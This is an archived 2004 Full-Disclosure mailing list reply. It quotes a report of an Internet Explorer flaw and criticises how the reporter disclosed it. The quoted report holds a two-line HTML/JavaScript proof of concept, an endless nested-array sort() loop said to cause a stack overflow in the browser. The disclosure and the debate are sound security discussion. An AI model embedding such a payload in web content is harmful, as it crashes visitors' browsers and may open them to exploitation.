[Full-Disclosure] Re: MSIE flaws: nested array sort() loop Stack overflow exception

From: Gadi Evron (ge_at_linuxbox.org)
Date: 11/26/04

  • Next message: Cyrille Barthelemy: "[Full-Disclosure] phpCMS <= 1.2.1 Xss Vulnerability, Information disclosure"
    To: Berend-Jan Wever <skylined@edup.tudelft.nl>
    Date: Fri, 26 Nov 2004 12:11:50 +0200
    
    

    Berend-Jan Wever wrote:
    > Hi all,
    >
    > Another flaw in IE:

    Yet another? No. You can't be serious.

    >
    > <HTML>
    > <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
    > <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
    > </HTML>
    >
    > Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more then willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow.

    Ahh, don't you mean normally you'd get paid for it but somebody decided
    you are too much of a "risk" to work with? Just guessing here. Or maybe
    you release this just to show us you have nothing against Mozilla?

    As to "and a patch tomorrow." - who are you kidding? Ever heard if Thor
    Larholm and his mailing list, Unpatched?
    If we are lucky, they will patch it secretly in a couple of releases. If
    not, wait 6 months.

    As it is IE.. well now, don't say they "violated" GPL when they use your
    stuff again for some virus.

    > PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) But more on that later...

    There is more to come? I guess you've been saving up. Is this all about
    teaching us all a lesson?

    I appreciate your work, and I appreciate your wishes. I really don't
    appreciate you or how you do things.

    It's a shame really.

            Gadi.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Cyrille Barthelemy: "[Full-Disclosure] phpCMS <= 1.2.1 Xss Vulnerability, Information disclosure"